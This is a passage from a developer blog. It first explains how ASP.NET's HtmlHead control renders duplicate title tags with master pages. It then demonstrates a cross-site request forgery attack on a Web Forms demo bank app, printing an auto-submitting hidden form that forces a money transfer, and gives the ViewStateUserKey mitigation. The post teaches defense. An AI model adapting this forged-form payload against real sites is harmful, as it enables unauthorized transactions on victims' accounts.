    <asp:LiteralControl runat="server" Text=" - MySite" />
  </title>
</head>
...

The second peculiarityhas to do with how the HeaderControl really wants to produce valid HTML markup.

If you leave the <head runat="server"></head> tag empty, and then view source at the rendered output, you’ll notice that it renders an empty <title> tag for you. It looked at its child controls collection and saw that it didn’t contain an HtmlTitle control so it rendered one for you.

This can cause problems when attempting to use a ContentPlaceHolder to render the title tag for you. For example, a common layout I’ve seen is the following.

<%@ Master ... %>
<html>
<head runat="server">
  <asp:ContentPlaceHolder ID="headContent" runat="server"> 
    <title>Testing</title>  
  </asp:ContentPlaceHolder>
</head>
...

This approach is neat because it allows you to not only set the title tag from within any content page, but any other content you want within the <head> tag.

However, if you view source on the rendered output, you’ll see two <title> tags, one that you specified and one that’s empty.

Going back to what wrote earlier, the reason becomes apparent. The HtmlHead control checks to see if it contains a child title control. When it doesn’t find one, it renders an empty one. However, it doesn’t look within the content placeholders defined within it to see if they’ve rendered a title tag.

This makes sense when you consider how the HtmlHead tag works. It only allows placing controls inside of it. However, a ContentPlaceHolder allows adding literal text in there. So while it looks the same, the title tag within the ContentPlaceHolder is not an HtmlTitle control. It’s just some text, and the HtmlHead control doesn’t want to parse all the rendered text from its children.

This is why I tend to take the following approach with my own master pages.

<%@ Master ... %>
<html>
<head runat="server">
  <title><asp:ContentPlaceHolder ID="titleContent" runat="server" /></title>
  <asp:ContentPlaceHolder ID="headContent" runat="server"> 
  </asp:ContentPlaceHolder>
</head>
...

Happy Titling!

asp.net comments edit

In my last blog post, I walked step by step through a Cross-site request forgery (CSRF) attack against an ASP.NET MVC web application. This attack is the result of how browsers handle cookies and cross domain form posts and is not specific to any one web platform. Many web platforms thus include their own mitigations to the problem.

It might seem that if you’re using Web Forms, you’re automatically safe from this attack. While Web Forms has many mitigations turned on by default, it turns out that it does not automatically protect your site against this specific form of attack.

In the same sample bank transfer application I provided in the last post, I also included an example written using Web Forms which demonstrates the CSRF attack. After you log in to the site, you can navigate to /BankWebForm/default.aspx to try out the Web Form version of the transfer money page. it works just like the MVC version.

To simulate the attack, make sure you are running the sample application locally and make sure you are logged in and then click on http://haacked.com/demos/csrf-webform.html.

Here’s the code for that page:

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title></title>
</head>
<body>
  <form name="badform" method="post"
    action="http://localhost:54607/BankWebForm/Default.aspx">
    <input type="hidden" name="ctl00$MainContent$amountTextBox"
      value="1000" />
    <input type="hidden" name="ctl00$MainContent$destinationAccountDropDown"
      value="2" />
    <input type="hidden" name="ctl00$MainContent$submitButton"
      value="Transfer" />
    <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET"
      value="" />
    <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT"
      value="" />
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
      value="/wEP...0ws8kIw=" />
    <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION"
      value="/wEWBwK...+FaB85Nc" />
    </form>
    <script type="text/javascript">
        document.badform.submit();
    </script>
</body>
</html>

It’s a bit more involved, but it does the trick. It mocks up all the proper hidden fields required to execute a bank transfer on my silly demo site.

The mitigation for this attack is pretty simple and described thoroughly in this this article by Dino Esposito as well as this post by Scott Hanselman. The change I made to my code behind based on Dino’s recommendation is the following:

protected override void OnInit(EventArgs e) {
  ViewStateUserKey = Session.SessionID;
  base.OnInit(e);
}

With this change in place, the CSRF attack I put in place no longer works.

When you go to a real bank site, you’ll learn they have all sorts of protections in place above and beyond what I described here. Hopefully this post and the previous one provided some insight into why they do all the things they do. :)

Technorati Tags: asp.net,security